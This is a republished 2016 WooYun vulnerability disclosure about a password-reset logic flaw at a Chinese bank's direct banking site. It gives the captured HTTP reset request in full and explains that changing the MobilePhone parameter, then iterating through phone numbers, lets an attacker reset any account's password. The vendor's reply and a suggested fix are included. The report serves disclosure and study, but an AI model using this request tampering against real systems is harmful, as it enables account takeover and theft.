P2P金融安全之宁波银行直销银行任意账户登录

admin 2017年3月20日20:14:27评论253 views字数 240阅读0分48秒阅读模式
摘要

2016-03-18: 细节已通知厂商并且等待厂商处理中
2016-03-19: 厂商已经确认,细节仅向厂商公开
2016-03-29: 细节向核心白帽子及相关领域专家公开
2016-04-08: 细节向普通白帽子公开
2016-04-18: 细节向实习白帽子公开
2016-05-03: 细节向公众公开

漏洞概要 关注数(12) 关注此漏洞

缺陷编号: WooYun-2016-186309

漏洞标题: P2P金融安全之宁波银行直销银行任意账户登录

相关厂商: 宁波银行股份有限公司

漏洞作者: 咚咚呛

提交时间: 2016-03-18 23:10

公开时间: 2016-05-03 21:39

漏洞类型: 设计缺陷/逻辑错误

危害等级: 高

自评Rank: 20

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 金融小能手

1人收藏


漏洞详情

披露状态:

2016-03-18: 细节已通知厂商并且等待厂商处理中
2016-03-19: 厂商已经确认,细节仅向厂商公开
2016-03-29: 细节向核心白帽子及相关领域专家公开
2016-04-08: 细节向普通白帽子公开
2016-04-18: 细节向实习白帽子公开
2016-05-03: 细节向公众公开

简要描述:

宁波银行直销银行,业务量一直在我国直销银行中名列前茅,2015年评选直销银行第9名,此次风险影响宁波直销银行的所有账户。 ------请认准金融小能手

详细说明:

此风险漏洞在密码找回功能中,漏洞利用步骤如下:

1、首先正常操作密码找回功能,可知其流程如下,

填写手机号及正确的短信验证码,如图:

P2P金融安全之宁波银行直销银行任意账户登录

2、输入要修改的密码,并进行抓包,如图:

P2P金融安全之宁波银行直销银行任意账户登录

数据包如下:

code 区域
POST /desktop/RetrievePassword4Y.do HTTP/1.1
Accept: application/json, text/plain, */*
Accept-Language: zh-cn
$referer: htmls/RetrievePassword/mod.html
Referer: https://**.**.**.**/desktop/index.html#/main/RetrievePassword/mod$inTrs
Content-Type: application/json;charset=utf-8
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Tablet PC 2.0)
Host: **.**.**.**
Content-Length: 168
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: web_vist_num=1; loginMark=zx; Hm_lvt_90e7f27474e0f7bc4b4462d412174657=1458294872,1458295213; is_si_expire=0; iss_webanalytics_id=b98afb0080834c4c9de697aae7e93092; JSESSIONID=00003aMfMqYLppOHcn5DdJ4uqop:-1; Hm_lpvt_90e7f27474e0f7bc4b4462d412174657=1458295213; si=3445ef42b685452b9e1817aeb57e5f29; nu=0; bfd_s=61335539.9085551.1458294880456; tmc=2.61335539.69562477.1458294880459.1458294880459.1458295236368; tma=61335539.69562477.1458294880459.1458294880459.1458294880459.1; tmd=2.61335539.69562477.1458294880459.; bfd_g=87205254007bf9520000d228000055b756ebcf3a

{"UserType":"ZY","MobilePhone":"15910773439","NewPassword":"k5/Qfh/Z+Uy2M3vP6dDTHg==","NewPasswordConfirm":"k5/Qfh/Z+Uy2M3vP6dDTHg==","_ChannelId":"pc","BankId":"9999"}

P2P金融安全之宁波银行直销银行任意账户登录

可完成密码修改重置功能

P2P金融安全之宁波银行直销银行任意账户登录

观察关键数据包/desktop/RetrievePassword4Y.do的参数MobilePhone为目标手机号,修改为被攻击者的手机号即可实现篡改帐户密码的攻击,如目标为15910676783,

P2P金融安全之宁波银行直销银行任意账户登录

登录后如:

P2P金融安全之宁波银行直销银行任意账户登录

可通过遍历手机号,完成篡改所有账户的目的,进而影响所有账户安全。

漏洞证明:

P2P金融安全之宁波银行直销银行任意账户登录

P2P金融安全之宁波银行直销银行任意账户登录

P2P金融安全之宁波银行直销银行任意账户登录

P2P金融安全之宁波银行直销银行任意账户登录

P2P金融安全之宁波银行直销银行任意账户登录

P2P金融安全之宁波银行直销银行任意账户登录

修复方案:

建议短信验证及密码重置数据包同意验证,防止分布绕过

版权声明:转载请注明来源 咚咚呛@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2016-03-19 21:39

厂商回复:

只对游客用户有影响,风险等级较低,已着手处理,非常感谢支持

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2016-03-19 00:44 | 坏男孩-A_A ( 实习白帽子 | Rank:81 漏洞数:23 | 膜拜学习中)

    1

    P2P

  2. 2016-03-19 03:54 | Brother ( 实习白帽子 | Rank:78 漏洞数:24 )

    1

    p2p霸屏首页?

  3. 2016-03-20 00:13 | 沧浪浪拔出保健 ( 普通白帽子 | Rank:289 漏洞数:27 | @互联网的那点事)

    1

    @宁波银行股份有限公司 游客会有账号?

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin